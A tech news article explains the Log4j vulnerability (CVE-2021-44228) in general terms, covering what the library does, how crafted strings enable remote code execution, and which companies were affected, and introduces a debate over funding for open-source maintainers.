The Log4j bug exposes a bigger issue: Open-source funding

While you were watching the F1 title decider between Max Verstappen and Lewis Hamilton or excited for the Succession finale, companies running the internet were scared shitless.

You might not have noticed it because services like Twitter, Facebook, Gmail, and smaller ones all stayed up. But a bug in an open-source tech called Log4j was (and still is) causing panic amongst the infosec community across the world.

While the bug has affected billions of devices, and companies are scrambling to apply fixes, the open-source community has a raging debate going on about funding volunteers that maintain projects like Log4j.

Before we dive into all that, here’s a brief background about the technology and the issue.

What is Log4j?

Log4j 2 is a Java-based open-sourced logging framework that comes under the Apache Foundation services, so anyone can use it for free. The logging software is used by companies to track activity on their servers (or even client-side apps).

For instance, when you visit a website, your IP address, your browser, and the pages you visit are registered by the logger. This data related to activity can help companies solve any problem with their service.

Since the library is Java-based, there’s a chance that billions of devices supported by the framework might be at risk.

What is the Log4j bug?

The bug, listed under CVE-2021-44228 last week, allows attackers to remotely execute code through a specially crafted string. Since Log4j is so common, cybercriminals can easily manipulate log strings and control the server or the client.

One of the main reasons for this bug’s existence is that some versions of Log4j are capable of executing arbitrary text through a directory lookup protocol (LDAP protocol).

If you want to read a detailed explanation of the issue in simple language, read this Twitter thread.

Who’s affected?

To be honest, I should’ve named this section “Who’s not affected?” Log4j’s open-source nature and widespread compatibility means it’s a great choice and tons of companies use it — including Apple, Microsoft, Steam, Twitter, Baidu, and Cloudflare.

As soon as the details about the vulnerability were out, several people started scanning servers to check if they were open to exploitation.

Some programmers tested various sites and services to check the potential reach of the attack; you can check out the full list here.